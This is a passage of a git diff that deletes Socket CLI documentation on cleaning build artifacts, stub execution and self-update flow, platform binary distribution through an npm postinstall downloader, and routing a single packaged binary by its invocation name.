- -# Remove old v22 builds -rm -rf .custom-node-build/node -rm -rf .custom-node-build/node-patched - -echo "Kept: .custom-node-build/node-yao-pkg (current)" -echo "Disk space freed: ~40GB" -``` - -### Clean All Build Artifacts - -```bash -#!/usr/bin/env bash -# scripts/clean-all.sh - -echo "Cleaning all build artifacts..." - -# Clean rollup output -pnpm run clean:dist - -# Clean pkg binaries -rm -rf pkg-binaries/ -rm -f socket socket-* - -# Clean Node.js builds (optional - takes 30-60 min to rebuild) -# rm -rf .custom-node-build/ - -echo "Build artifacts cleaned" -echo "Run 'pnpm run build' to rebuild" -``` - -### Clean Everything (Fresh Start) - -```bash -#!/usr/bin/env bash -# scripts/clean-everything.sh - -echo "⚠️ This will remove ALL build artifacts and dependencies" -echo "You'll need to reinstall and rebuild everything" -read -p "Are you sure? (y/N) " -n 1 -r -echo -if [[ $REPLY =~ ^[Yy]$ ]]; then - # Remove dependencies - rm -rf node_modules/ - - # Remove build artifacts - rm -rf dist/ - rm -rf pkg-binaries/ - rm -rf .custom-node-build/ - - # Remove caches - rm -rf .rollup.cache/ - rm -rf .cache/ - - echo "Everything cleaned!" 
- echo "Run 'pnpm install && pnpm run build:yao-pkg:node' to start fresh" -fi -``` - ---- - -## CI/CD Recommendations - -### GitHub Actions - -**Option 1: Build Node.js on each run (slow)** -```yaml -- name: Build custom Node.js - run: pnpm run build:yao-pkg:node # 30-60 minutes -``` - -**Option 2: Cache Node.js build (faster)** -```yaml -- name: Cache Node.js build - uses: actions/cache@v4 - with: - path: .custom-node-build/node-yao-pkg - key: node-yao-pkg-v24.9.0-${{ runner.os }}-${{ runner.arch }} - -- name: Build Node.js if not cached - if: steps.cache-node.outputs.cache-hit != 'true' - run: pnpm run build:yao-pkg:node -``` - -**Option 3: Use pre-built binary (fastest)** -```yaml -- name: Download pre-built Node.js - run: | - curl -L https://github.com/.../releases/.../node-v24.10.0-yao-pkg.tar.gz | tar xz - mv node .custom-node-build/node-yao-pkg/out/Release/node -``` - -### Artifact Uploads - -```yaml -- name: Upload pkg binaries - uses: actions/upload-artifact@v4 - with: - name: socket-${{ matrix.platform }} - path: pkg-binaries/socket-${{ matrix.platform }} - retention-days: 7 # Don't keep forever -``` - ---- - -## Best Practices - -### For Local Development - -1. **Keep only current Node build:** - ```bash - # Remove old builds - rm -rf .custom-node-build/node - rm -rf .custom-node-build/node-patched - - # Keep: .custom-node-build/node-yao-pkg - ``` - -2. **Don't commit build artifacts:** - - `.gitignore` is already configured - - Run `git status` to verify - -3. **Clean before release:** - ```bash - pnpm run clean:dist - pnpm run build:cli - pnpm run build:yao-pkg - ``` - -### For CI/CD - -1. **Cache Node.js builds** to avoid 30-60 minute build times -2. **Upload artifacts** to GitHub Releases, not repo -3. **Build only needed platforms** (linux-x64 for Docker, etc.) -4. **Set artifact retention** (7-30 days, not forever) - -### For Distribution - -1. 
**Release artifacts to GitHub Releases:** - - Upload pkg binaries as release assets - - Don't include in npm package - - Users download specific platform - -2. **npm package includes:** - - Source code (`src/`) - - Rollup output (`dist/`) - - No binaries - -3. **Docker images:** - - Copy `pkg-binaries/socket-linux-x64` to image - - Don't include full repo - ---- - -## Directory Size Reference - -| Path | Size | Can Delete? | Rebuild Time | -|------|------|-------------|--------------| -| `node_modules/` | 2-3 GB | Yes | `pnpm install` (~2 min) | -| `.custom-node-build/node-yao-pkg/` | 19-20 GB | No (current) | 30-60 minutes | -| `.custom-node-build/node/` | 20 GB | Yes (old) | N/A | -| `.custom-node-build/node-patched/` | 20 GB | Yes (old) | N/A | -| `dist/` | 10-15 MB | Yes | `pnpm run build:cli` (~10 sec) | -| `pkg-binaries/` | 500 MB | Yes | `pnpm run build:yao-pkg` (~30 sec) | - -**Total reclaimable:** ~40 GB (by removing old Node builds) - ---- - -## Troubleshooting - -### "Where is the custom Node.js binary?" - -**Location:** `.custom-node-build/node-yao-pkg/out/Release/node` - -**How to rebuild:** -```bash -pnpm run build:yao-pkg:node -``` - -### "Where do pkg binaries go?" - -**Location:** `pkg-binaries/` directory - -**Configured in:** `pkg.json` → `outputPath` field - -**How to rebuild:** -```bash -pnpm run build:yao-pkg -``` - -### "Why is .custom-node-build so large?" - -Node.js source is ~1.5GB, plus build artifacts (~17-18GB) makes ~19-20GB total per build. - -**Solution:** Keep only the current build (`node-yao-pkg`), delete old ones: -```bash -rm -rf .custom-node-build/node -rm -rf .custom-node-build/node-patched -``` - -### "Can I commit pkg binaries?" - -**No.** They're too large (90-110MB each) and platform-specific. 
- -**Instead:** -- Upload to GitHub Releases -- Build in CI/CD -- Download on demand - ---- - -## Summary - -### Tracked in Git -- ✅ Source code (`src/`) -- ✅ Build scripts (`scripts/`) -- ✅ Socket CLI patches (`patches/`) -- ✅ Configuration files (`pkg.json`, `package.json`, etc.) -- ✅ Documentation (`docs/`) - -### Not Tracked in Git (Build Artifacts) -- ❌ Custom Node.js builds (`.custom-node-build/`) -- ❌ pkg binaries (`pkg-binaries/`, `socket-*`) -- ❌ Rollup output (`dist/`) -- ❌ Dependencies (`node_modules/`) -- ❌ Caches (`.rollup.cache/`, `.cache/`) - -### Cleanup Recommendation -Remove old Node builds to free ~40GB: -```bash -rm -rf .custom-node-build/node .custom-node-build/node-patched -``` - -### Build From Scratch -```bash -# Clean start -pnpm install # Install dependencies (2-3 min) -pnpm run build:yao-pkg:node # Build Node.js (30-60 min, one-time) -pnpm run build:cli # Build CLI (10 sec) -pnpm run build:yao-pkg # Build pkg binaries (30 sec) -``` diff --git a/docs/architecture/stub-execution.md b/docs/architecture/stub-execution.md deleted file mode 100644 index cbad48146..000000000 --- a/docs/architecture/stub-execution.md +++ /dev/null @@ -1,439 +0,0 @@ -# Stub Execution & Update Flow - -This document describes the complete flow of Socket CLI's stub execution mechanism, including Node.js runtime selection, update checking logic, and permission handling. 
- -## Directory Structure - -``` -~/.socket/ -├── _cli/ # CLI root (all CLI-related data) -│ ├── package/ # @socketsecurity/cli from npm -│ │ ├── package.json -│ │ ├── dist/ -│ │ │ ├── cli.js # Main CLI entry point -│ │ │ ├── commands/ -│ │ │ └── utils/ -│ │ ├── node_modules/ -│ │ ├── requirements.json -│ │ ├── translations.json -│ │ └── shadow-bin/ -│ │ -│ ├── stub/ # Stub management (SEA binary updates) -│ │ ├── downloads/ # Downloaded stub binaries -│ │ ├── staging/ # Staging area for stub updates -│ │ └── backups/ # Timestamped stub backups -│ │ -│ ├── .install.lock # Installation lock (transient, only during install) -│ └── cli-1.1.24.tgz # Downloaded tarball (transient, deleted after extract) -│ -└── _cacache/ # All caches (cacache format) - ├── content-v2/ # Content-addressable storage - ├── index-v5/ # Index for lookups - └── tmp/ # Temporary files -``` - -## 1. Stub Startup - Node.js Decision Tree - -``` -User runs: /usr/local/bin/socket scan - ↓ -┌──────────────────────────────────────────────────────────────────────┐ -│ Stub Binary (yao-pkg executable) │ -│ Checks: ~/.socket/_dlx/package/package.json exists? │ -└──────────────────────────────────────────────────────────────────────┘ - ↓ No ↓ Yes -┌──────────────────────────┐ ┌──────────────────────────────────────┐ -│ Download & Install CLI │ │ CLI Already Installed │ -│ (see install flow) │ └──────────────────────────────────────┘ -└──────────────────────────┘ ↓ - ↓ ┌──────────────────────────────────────┐ - └────────────────────→│ Detect Node.js Runtime: │ - │ │ - │ 1. Check system Node.js: │ - │ spawn('node', ['--version']) │ - │ │ - │ 2. Parse version (e.g., "v22.0.0") │ - │ │ - │ 3. Compare: version >= MIN_NODE_VER? 
│ - │ (MIN_NODE_VERSION = 22) │ - └──────────────────────────────────────┘ - ↓ - ┌───────────────────────┴───────────────────────┐ - ↓ System Node >= v22 ↓ No/Old Node -┌──────────────────────────────────────┐ ┌──────────────────────────────────────┐ -│ Use System Node.js: │ │ Use Embedded Runtime: │ -│ │ │ │ -│ spawn('node', [ │ │ spawn(process.argv[0], [ │ -│ '--no-addons', │ │ '--no-addons', │ -│ '--no-warnings', │ │ '--no-warnings', │ -│ '~/.socket/_dlx/package/dist/cli.js', │ '~/.socket/_dlx/package/dist/cli.js', │ -│ ...args │ │ ...args │ -│ ], { │ │ ], { │ -│ }) │ │ stdio: ['inherit', 'inherit', │ -│ │ │ 'inherit', 'ipc'] │ -│ Benefits: │ │ }) │ -│ - Faster startup (~50-200ms) │ │ │ -│ - Smaller memory footprint │ │ Benefits: │ -│ - Native module support │ │ - Works without Node.js installed │ -└──────────────────────────────────────┘ │ - Consistent runtime version │ - ↓ └──────────────────────────────────────┘ - └───────────────────────┬───────────────────────┘ - ↓ -┌──────────────────────────────────────────────────────────────────────┐ -│ IPC Handshake (both cases): │ -│ │ -│ child.send({ │ -│ SOCKET_IPC_HANDSHAKE: { │ -│ SOCKET_CLI_STUB_PATH: '/usr/local/bin/socket' │ -│ } │ -│ }) │ -│ │ -│ CLI receives stub path for: │ -│ - isSeaBinary() detection │ -│ - Self-update stub replacement │ -│ │ -│ Note: CLI knows its own path via __filename/import.meta.url │ -└──────────────────────────────────────────────────────────────────────┘ -``` - -### Node.js Detection Logic - -```typescript -// In src/sea/stub.mts -async function detectSystemNode(): Promise { - try { - const nodeCmd = process.platform === 'win32' ? 
'node.exe' : 'node' - - // Check if node exists and get version - const { stdout } = await execFile(nodeCmd, ['--version'], { timeout: 2000 }) - - // Parse version (e.g., "v22.0.0" -> 22) - const versionMatch = stdout.trim().match(/^v(\d+)\./) - if (!versionMatch) return null - - const majorVersion = parseInt(versionMatch[1], 10) - if (majorVersion >= MIN_NODE_VERSION) { - debugLog(`System Node.js v${majorVersion} meets requirements (>= v${MIN_NODE_VERSION})`) - return nodeCmd - } else { - debugLog(`System Node.js v${majorVersion} too old (requires >= v${MIN_NODE_VERSION})`) - return null - } - } catch { - return null // No system Node.js or error occurred - } -} -``` - -## 2. Update Checker Package Name Logic - -The update checker uses different package names depending on how the CLI is running: - -```typescript -// In src/cli.mts -async function getUpdatePackageName(): string { - if (isSeaBinary()) { - // SEA binaries check the "socket" package on npm - // This contains the stub binary distributions - return 'socket' - } else { - // Regular npm installs check "@socketsecurity/cli" - // This is the actual CLI package - return '@socketsecurity/cli' - } -} - -// Usage in scheduleUpdateCheck: -await scheduleUpdateCheck({ - name: await getUpdatePackageName(), - version: packageJson.version, - authInfo: lookupRegistryAuthToken(registryUrl, { recursive: true }), -}) -``` - -### Why Two Different Packages? - -- **`@socketsecurity/cli`**: The main CLI package with JavaScript code - - Changes frequently (new features, bug fixes) - - ~30MB when installed with node_modules - - Downloaded and extracted to `~/.socket/_dlx/package/` - -- **`socket`**: The stub binary package - - Changes rarely (only for bootstrap updates) - - Platform-specific binaries (~1-5MB each) - - Used to update `/usr/local/bin/socket` executable - -## 3. Installation Flow with Permissions - -``` -Download & Extract CLI: - ↓ -┌──────────────────────────────────────────────────────────────────────┐ -│ 1. 
Download @socketsecurity/cli tarball │ -│ → ~/.socket/_dlx/cli-1.1.24.tgz │ -└──────────────────────────────────────────────────────────────────────┘ - ↓ -┌──────────────────────────────────────────────────────────────────────┐ -│ 2. Extract with nanotar: │ -│ for (const file of files) { │ -│ const targetPath = path.join(CLI_PACKAGE_DIR, sanitizedPath) │ -│ await fs.writeFile(targetPath, fileData) │ -│ │ -│ // CRITICAL: Preserve executable permissions │ -│ if (file.attrs?.mode) { │ -│ const mode = parseInt(file.attrs.mode, 8) │ -│ await fs.chmod(targetPath, mode) │ -│ } │ -│ │ -│ // Special handling for bin/ and shadow-bin/ │ -│ if (targetPath.includes('/bin/') || │ -│ targetPath.includes('/shadow-bin/') || │ -│ targetPath.includes('/dist/shadow')) { │ -│ await fs.chmod(targetPath, 0o755) // rwxr-xr-x │ -│ } │ -│ } │ -└──────────────────────────────────────────────────────────────────────┘ - ↓ -┌──────────────────────────────────────────────────────────────────────┐ -│ 3. Cleanup: │ -│ - remove(~/.socket/_dlx/cli-1.1.24.tgz) # Delete tarball │ -│ - remove(~/.socket/_dlx/.install.lock) # Release lock │ -└──────────────────────────────────────────────────────────────────────┘ -``` - -### Permission Handling Details - -NPM tarballs include Unix permissions in their metadata: -- Regular files: `0644` (rw-r--r--) -- Executable files: `0755` (rwxr-xr-x) - -The bootstrap ensures executables remain executable: - -1. **Preserve tarball permissions**: Parse and apply the mode from tarball metadata -2. **Force executable for critical paths**: - - `bin/` - CLI entry points - - `shadow-bin/` - npm/npx wrappers - - `dist/shadow/` - Shadow binary implementations - -## 4. Stub Update Flow with Permissions - -``` -socket self-update (when isSeaBinary()): - ↓ -┌──────────────────────────────────────────────────────────────────────┐ -│ Check both packages: │ -│ 1. npm view socket version → Stub binary updates │ -│ 2. 
npm view @socketsecurity/cli version → CLI code updates │ -└──────────────────────────────────────────────────────────────────────┘ - ↓ -┌──────────────────────────────────────────────────────────────────────┐ -│ Update Stub Binary: │ -│ │ -│ 1. Download new stub: │ -│ const stubName = `socket-${platform}-${arch}${ext}` │ -│ → ~/.socket/_dlx/stub/downloads/socket-darwin-arm64 │ -│ │ -│ 2. CRITICAL: Set executable permissions │ -│ await fs.chmod(downloadPath, 0o755) │ -│ │ -│ 3. Clear macOS quarantine (if macOS): │ -│ await exec('xattr', ['-cr', downloadPath]) │ -│ │ -│ 4. Stage with permissions: │ -│ const stagingPath = ~/.socket/_dlx/stub/staging/socket │ -│ await fs.copyFile(downloadPath, stagingPath) │ -│ await fs.chmod(stagingPath, 0o755) │ -│ │ -│ 5. Backup current: │ -│ const backupPath = `~/.socket/_dlx/stub/backups/socket-${ts}` │ -│ await fs.copyFile(currentStubPath, backupPath) │ -│ await fs.chmod(backupPath, 0o755) // Preserve exec │ -│ │ -│ 6. Atomic replace: │ -│ if (process.platform === 'win32') { │ -│ // Windows: rename current, then replace │ -│ await fs.rename(currentPath, tempName) │ -│ await fs.rename(stagingPath, currentPath) │ -│ } else { │ -│ // Unix: atomic rename │ -│ await fs.rename(stagingPath, currentPath) │ -│ } │ -└──────────────────────────────────────────────────────────────────────┘ -``` - -### Platform-Specific Considerations - -**macOS**: -- Must clear quarantine attributes: `xattr -cr ` -- Ad-hoc code signing may be required: `codesign --sign - ` - -**Windows**: -- Cannot replace running executable directly -- Must rename current, then replace -- `.exe` extension required - -**Linux**: -- Simple atomic rename works -- No special attributes needed - -## 5. 
Lock File Management - -The bootstrap uses `.install.lock` to prevent concurrent installations: - -```typescript -async function acquireLock(): Promise { - const lockPath = path.join(SOCKET_CLI_DIR, '.install.lock') - - for (let attempt = 0; attempt < LOCK_MAX_RETRIES; attempt++) { - try { - // Atomic check-and-create - await fs.writeFile(lockPath, String(process.pid), { flag: 'wx' }) - return lockPath - } catch (error) { - if (error.code === 'EEXIST') { - // Check if lock holder is still alive - const lockPid = await fs.readFile(lockPath, 'utf8') - try { - process.kill(lockPid, 0) // Check if process exists - // Process exists, wait and retry - await sleep(LOCK_RETRY_DELAY_MS) - } catch { - // Process dead, remove stale lock - await remove(lockPath) - } - } - } - } - throw new Error('Failed to acquire lock after 30 seconds') -} -``` - -**Critical**: Lock is **always** released in `finally` block: -```typescript -try { - lockPath = await acquireLock() - // ... installation ... -} finally { - if (lockPath) { - await releaseLock(lockPath) // Guaranteed cleanup - } -} -``` - -## 6. Cache Management - -All caches use `_cacache` directory: - -```typescript -// Update check cache -const cacheKey = 'update-check:@socketsecurity/cli' -await cacache.put(CACACHE_DIR, cacheKey, JSON.stringify({ - timestamp: Date.now(), - currentVersion: '1.1.24', - latestVersion: '1.1.25', - lastChecked: Date.now(), -})) - -// Socket API cache -const apiCacheKey = `socket-api:${endpoint}:${hash(params)}` -await cacache.put(CACACHE_DIR, apiCacheKey, response) - -// GitHub API cache -const ghCacheKey = `github:${owner}/${repo}:${endpoint}` -await cacache.put(CACACHE_DIR, ghCacheKey, data) -``` - -## 7. Error Recovery - -### Installation Failures - -If installation fails: -1. Tarball is deleted (cleanup in `finally`) -2. Lock is released (cleanup in `finally`) -3. 
Partial extraction remains (allows debugging) - -To recover: -```bash -# Clean partial installation -rm -rf ~/.socket/_dlx/package - -# Retry -socket --version -``` - -### Update Failures - -If update fails: -1. New files remain in staging/downloads -2. Original binary unchanged -3. Backup preserved in backups/ - -To recover: -```bash -# Clean staging -rm -rf ~/.socket/_dlx/stub/staging/* -rm -rf ~/.socket/_dlx/stub/downloads/* - -# Retry -socket self-update -``` - -## 8. Performance Characteristics - -### Startup Times - -| Scenario | Time | Notes | -|----------|------|-------| -| System Node.js (cached) | ~50-200ms | Fastest path | -| Embedded runtime (cached) | ~100-500ms | SEA overhead | -| First install | ~3-13s | Network dependent | -| Cache check | ~1ms | File existence check | -| Node version detection | ~10-50ms | Subprocess spawn | - -### Disk Usage - -| Component | Size | Notes | -|-----------|------|-------| -| Bootstrap stub | ~1-5MB | Platform-specific | -| CLI package | ~30MB | Includes node_modules | -| Stub backups | ~1-5MB each | Configurable retention | -| Cache (_cacache) | Variable | Auto-pruned by cacache | - -## 9. 
Security Considerations - -### Path Protection - -The `remove()` function prevents catastrophic deletes: -```typescript -async function remove(filepath: string, options?: { force?: boolean }): Promise { - const absolutePath = path.resolve(filepath) - - // Prevent deleting outside SOCKET_HOME - const relation = path.relative(SOCKET_HOME, absolutePath) - if (!isInside) { - throw new Error(`Cannot delete outside SOCKET_HOME`) - } - - // Prevent deleting cwd - if (absolutePath === cwd) { - throw new Error('Cannot delete current working directory') - } -} -``` - -### Permission Preservation - -- Tarball permissions are preserved during extraction -- Executable bits are enforced for critical binaries -- Backups maintain original permissions - -### Integrity Verification - -Future enhancements: -- SHA256 checksums for downloaded packages -- GPG signature verification -- Certificate pinning for HTTPS - ---- - -*Document created: 2025-10-07* \ No newline at end of file diff --git a/docs/architecture/stub-package.md b/docs/architecture/stub-package.md deleted file mode 100644 index 5f602114d..000000000 --- a/docs/architecture/stub-package.md +++ /dev/null @@ -1,390 +0,0 @@ -# Socket CLI Stub Package & Binary Distribution Flow - -This document describes how Socket CLI handles platform-specific binary distribution through the `socket` npm package, from CI/CD generation to installation on user machines. - -## Overview - -The Socket CLI uses a two-tier distribution model: -1. **`socket` npm package**: Lightweight npm package that downloads platform-specific binaries -2. **`@socketsecurity/cli` npm package**: Full CLI implementation (JavaScript/TypeScript) - -The binaries are built using yao-pkg (enhanced fork of vercel/pkg), not Node.js native SEA. - -## Architecture Components - -``` -┌─────────────────────────────────────────────────────────────────────────┐ -│ Binary Distribution Flow │ -├─────────────────────────────────────────────────────────────────────────┤ -│ │ -│ 1. 
CI/CD Build 2. GitHub Releases 3. NPM Package │ -│ ┌──────────────┐ ┌────────────────┐ ┌──────────────┐ │ -│ │ Build Matrix │───────>│ Binary Assets │<────│ socket@1.x │ │ -│ │ (6 platforms)│ │ socket-*.exe │ │ install.js │ │ -│ └──────────────┘ └────────────────┘ └──────────────┘ │ -│ │ │ -│ ↓ │ -│ ┌──────────────┐ │ -│ │ User Machine │ │ -│ │ npm install │ │ -│ └──────────────┘ │ -└─────────────────────────────────────────────────────────────────────────┘ -``` - -## 1. CI/CD Binary Generation - -### Build Matrix - -The GitHub Actions workflow (`release-sea.yml`) builds binaries for 6 platform/architecture combinations: - -```yaml -matrix: - include: - # Linux builds - - os: ubuntu-latest - platform: linux - arch: x64 - - os: ubuntu-latest - platform: linux - arch: arm64 # Cross-compilation - - # macOS builds (native compilation) - - os: macos-latest - platform: darwin - arch: x64 - - os: macos-latest - platform: darwin - arch: arm64 - - # Windows builds - - os: windows-latest - platform: win32 - arch: x64 - - os: windows-2022-arm64 - platform: win32 - arch: arm64 # Native ARM64 runner -``` - -### Build Process - -Each platform build follows these steps: - -1. **Build Stub**: Compile TypeScript stub to CommonJS - ```bash - pnpm run build:sea:stub - # Outputs: dist/sea/stub.cjs - ``` - -2. **Package with yao-pkg**: Create single executable - - Uses yao-pkg (enhanced fork of vercel/pkg) - - Not Node.js 24's native SEA feature - - Embeds Node.js runtime + stub code - - Configures platform-specific settings - -3. 
**Platform Post-Processing**: - - **Windows**: Sign with certificate (if available) - - **macOS**: Remove quarantine attributes, ad-hoc sign - - **Linux**: Set executable permissions - -### Binary Naming Convention - -Binaries follow a consistent naming pattern: -``` -socket-{platform}-{arch}{extension} - -Examples: -- socket-linux-x64 -- socket-darwin-arm64 -- socket-win32-x64.exe -``` - -Platform mapping: -- `darwin` → `macos` (in download URLs) -- `win32` → `win` (in download URLs) - -## 2. GitHub Release Storage - -### Release Structure - -Binaries are uploaded to GitHub releases with this structure: -``` -https://github.com/SocketDev/socket-cli/releases/download/v{version}/ -├── socket-linux-x64 -├── socket-linux-arm64 -├── socket-darwin-x64 -├── socket-darwin-arm64 -├── socket-win32-x64.exe -└── socket-win32-arm64.exe -``` - -### Release Workflow - -1. **Trigger**: Manual workflow dispatch or GitHub release creation -2. **Build**: All platforms built in parallel -3. **Upload**: Binaries uploaded to release assets -4. **Draft**: Releases created as drafts for manual review -5. **Publish**: Manual step to make release public - -### Versioning - -- Release tags follow semver: `v1.1.24` -- Binary URLs are deterministic based on version -- Fallback to latest release if specific version not found - -## 3. NPM Package Structure - -### Package Contents - -The `socket` npm package (`src/sea/npm-package/`) contains: - -``` -socket/ -├── package.json # Package metadata & postinstall script -├── install.js # Platform detection & binary download -├── socket # Fallback shim (replaced by binary) -└── README.md # Usage instructions -``` - -### Package.json Configuration - -```json -{ - "name": "socket", - "version": "1.1.24", - "bin": { - "socket": "socket" - }, - "scripts": { - "postinstall": "node install.js" - }, - "preferGlobal": true, - "engines": { - "node": ">=18.18.0" - } -} -``` - -## 4. 
Installation Flow - -### Platform Detection - -The `install.js` script detects the current platform: - -```javascript -function getBinaryName() { - const platform = PLATFORM_MAP[os.platform()] - const arch = ARCH_MAP[os.arch()] - - if (!platform || !arch) { - throw new Error(`Unsupported platform: ${os.platform()} ${os.arch()}`) - } - - const extension = os.platform() === 'win32' ? '.exe' : '' - return `socket-${platform}-${arch}${extension}` -} -``` - -### Platform Mappings - -```javascript -const PLATFORM_MAP = { - darwin: 'macos', // macOS - linux: 'linux', - win32: 'win' // Windows -} - -const ARCH_MAP = { - arm64: 'arm64', // ARM 64-bit (Apple Silicon, etc.) - x64: 'x64' // Intel/AMD 64-bit -} -``` - -### Download Process - -``` -npm install -g socket - ↓ -┌──────────────────────────────────────────────────────────┐ -│ Postinstall Script (install.js) │ -│ │ -│ 1. Detect Platform: │ -│ os.platform() + os.arch() → socket-linux-x64 │ -│ │ -│ 2. Construct Download URL: │ -│ https://github.com/.../v1.1.24/socket-linux-x64 │ -│ │ -│ 3. Download Binary: │ -│ HTTPS GET with redirects → temp file │ -│ │ -│ 4. Set Permissions: │ -│ chmod 755 (Unix) or no-op (Windows) │ -│ │ -│ 5. Replace Shim: │ -│ Atomic rename from temp to 'socket' │ -└──────────────────────────────────────────────────────────┐ -``` - -### Error Handling - -The installation is designed to be resilient: - -```javascript -try { - // Download and install binary -} catch (error) { - console.error('Failed to install Socket CLI binary:', error.message) - console.error('You may need to install from source: npm install @socketsecurity/cli') - // Don't fail the install - allow fallback -} -``` - -Fallback options: -1. Keep shim script that shows error message -2. User can install `@socketsecurity/cli` directly -3. Manual binary download from GitHub releases - -## 5. 
Binary Execution Flow - -Once installed, the binary execution follows this flow: - -``` -$ socket scan - ↓ -┌──────────────────────────────────────────┐ -│ Platform Binary (socket-linux-x64) │ -│ │ -│ 1. Stub Code Executes │ -│ 2. Check ~/.socket/_dlx/package/ │ -│ 3. Download @socketsecurity/cli if needed │ -│ 4. Spawn Node.js with CLI │ -└──────────────────────────────────────────┘ -``` - -## 6. Update Mechanism - -The stub package has a dual update mechanism: - -### Stub Updates (Binary) - -When running `socket self-update` as a SEA binary: -1. Check npm registry for `socket` package version -2. Compare with embedded version -3. Download new binary from GitHub if available -4. Atomic replacement with backup - -### CLI Updates (JavaScript) - -The actual CLI code updates independently: -1. Check npm registry for `@socketsecurity/cli` version -2. Download and extract new tarball to `~/.socket/_dlx/package/` -3. Next execution uses new CLI code - -## 7. Platform Support - -### Fully Supported (CI builds) -- Linux x64 -- Linux ARM64 -- macOS x64 (Intel) -- macOS ARM64 (Apple Silicon) -- Windows x64 -- Windows ARM64 - -### Unsupported Platforms -For unsupported platforms, users must: -1. Install Node.js v22+ -2. Install `@socketsecurity/cli` directly -3. Use `npx @socketsecurity/cli` or global install - -## 8. Security Considerations - -### Binary Integrity -- Binaries built in GitHub Actions (auditable) -- SHA256 checksums in release notes -- npm provenance for package publishing - -### Download Security -- HTTPS only for downloads -- GitHub releases as trusted source -- Fallback to error rather than insecure operation - -### Platform Security -- **macOS**: Quarantine attributes cleared, ad-hoc signed -- **Windows**: Optional code signing with certificate -- **Linux**: Standard executable permissions - -## 9. 
Local Development - -### Building Binaries Locally - -```bash -# Build for current platform -pnpm run build --sea - -# Build for specific platform -pnpm run build --sea -- --platform=darwin --arch=arm64 - -# Build all platforms (requires cross-compilation setup) -pnpm run build --sea -- --all -``` - -### Testing Installation - -```bash -# Test install.js locally -cd src/sea/npm-package -npm_config_global=true node install.js - -# Test with specific version -SOCKET_VERSION=1.1.24 node install.js -``` - -### Publishing Flow - -```bash -# Build all binaries -pnpm run build --sea - -# Upload to GitHub (requires gh CLI) -pnpm run publish:sea:github - -# Publish npm package -cd src/sea/npm-package -npm publish --access public -``` - -## 10. Troubleshooting - -### Common Issues - -1. **"Unsupported platform" error** - - Platform/arch combination not in matrix - - Solution: Install `@socketsecurity/cli` directly - -2. **Download fails during install** - - Network issues or GitHub rate limiting - - Solution: Manual download from releases page - -3. **Permission denied on Unix** - - Binary not marked executable - - Solution: `chmod +x $(which socket)` - -4. 
**Windows Defender blocks execution** - - Unsigned binary flagged - - Solution: Add exception or build signed binary - -### Debug Environment Variables - -```bash -# Enable debug output -DEBUG=1 npm install -g socket - -# Skip binary download (keep shim) -SKIP_BINARY_DOWNLOAD=1 npm install -g socket - -# Use specific Node.js version for SEA -SOCKET_CLI_SEA_NODE_VERSION=24.8.0 pnpm run build --sea -``` - ---- - -*Document created: 2025-10-07* \ No newline at end of file diff --git a/docs/architecture/unified-binary.md b/docs/architecture/unified-binary.md deleted file mode 100644 index 60e8524f8..000000000 --- a/docs/architecture/unified-binary.md +++ /dev/null @@ -1,208 +0,0 @@ -# Unified Binary Architecture for SEA/Yao Packages - -## Overview - -Socket CLI provides multiple command-line tools (`socket`, `socket-npm`, `socket-npx`, etc.), but Node.js SEA and similar packaging tools like Yao only support creating a single executable from one entry point. This document explains how we solve this limitation using a unified binary architecture. - -## The Challenge - -Our package.json defines 5 different binaries: -```json -{ - "bin": { - "socket": "bin/cli.js", // Main CLI - "socket-npm": "bin/npm-cli.js", // npm wrapper - "socket-npx": "bin/npx-cli.js", // npx wrapper - "socket-pnpm": "bin/pnpm-cli.js", // pnpm wrapper - "socket-yarn": "bin/yarn-cli.js" // yarn wrapper - } -} -``` - -SEA (Single Executable Application) limitation: -- Can only create ONE executable binary -- Cannot package multiple entry points -- Same limitation exists in Yao, pkg, nexe, etc. - -## The Solution: Command Detection - -We use a single unified binary that detects how it was invoked and routes to the appropriate behavior. - -### How It Works - -1. **Single Binary**: Build one executable named `socket` -2. 
**Symlinks/Copies**: Create symlinks (Unix) or copies (Windows) for other commands: - - `socket-npm` → `socket` - - `socket-npx` → `socket` - - `socket-pnpm` → `socket` - - `socket-yarn` → `socket` - -3. **Command Detection**: The binary detects its invocation name: - ```javascript - const INVOKED_AS = path.basename(process.argv0) - const COMMAND_MAP = { - 'socket': 'cli.js', - 'socket-npm': 'npm-cli.js', - 'socket-npx': 'npx-cli.js', - // ... - } - ``` - -4. **Routing**: Based on the detected name, it spawns the appropriate CLI tool - -## Implementation - -### Bootstrap Code (`src/sea/bootstrap-unified.mts`) - -The unified bootstrap: -1. Detects how it was invoked -2. Downloads the Socket CLI package if needed (first run) -3. Routes to the correct entry point based on invocation name -4. Spawns the appropriate command - -### Build Process - -```bash -# Build the unified SEA binary -node scripts/build-unified-sea.mjs - -# This creates: -# dist/sea/socket (main binary) -# dist/sea/socket-npm (symlink/copy) -# dist/sea/socket-npx (symlink/copy) -# dist/sea/socket-pnpm (symlink/copy) -# dist/sea/socket-yarn (symlink/copy) -``` - -### Platform Differences - -**Unix/macOS:** -- Uses symlinks (lightweight, single binary on disk) -- All symlinks point to the same `socket` binary -- File system reports different `argv[0]` based on symlink name - -**Windows:** -- Uses file copies (symlinks require admin privileges) -- Each `.exe` is a full copy but same internal logic -- Process name detection works the same way - -## Distribution - -When distributing the SEA package: - -### Option 1: Distribute All Files -``` -socket-cli-v1.0.0-darwin-x64.tar.gz -├── socket -├── socket-npm -> socket -├── socket-npx -> socket -├── socket-pnpm -> socket -└── socket-yarn -> socket -``` - -### Option 2: Single Binary + Install Script -``` -socket-cli-v1.0.0-darwin-x64.tar.gz -├── socket -└── install.sh # Creates symlinks during installation -``` - -### Option 3: Package Manager Integration 
-```bash -# npm package could create symlinks in postinstall -npm install -g @socketsecurity/cli-binary -``` - -## Testing - -Test that command routing works: - -```bash -# Test main CLI -./socket --version - -# Test npm wrapper (should intercept npm commands) -./socket-npm install express - -# Test npx wrapper -./socket-npx create-react-app - -# Test pnpm wrapper -./socket-pnpm install - -# Test yarn wrapper -./socket-yarn add lodash -``` - -## Benefits - -1. **Single Binary**: Only one large binary to build and distribute -2. **Smaller Size**: Symlinks add no disk space -3. **Consistent Updates**: Update one binary, all commands updated -4. **Cross-Platform**: Works on Windows, macOS, Linux -5. **User Transparent**: Users interact with expected command names - -## Compatibility with Yao - -This approach works identically with Yao or other Node.js packagers: - -```javascript -// yao.config.js -module.exports = { - entry: 'src/sea/bootstrap-unified.js', - output: 'socket', - // ... other config -} -``` - -Then create symlinks/copies for the other commands after Yao builds the binary. - -## Future Enhancements - -### Subcommand Detection -Could also support subcommand style: -```bash -socket cli ... # Main CLI -socket npm ... # npm wrapper -socket npx ... # npx wrapper -``` - -### Multi-Binary Builds 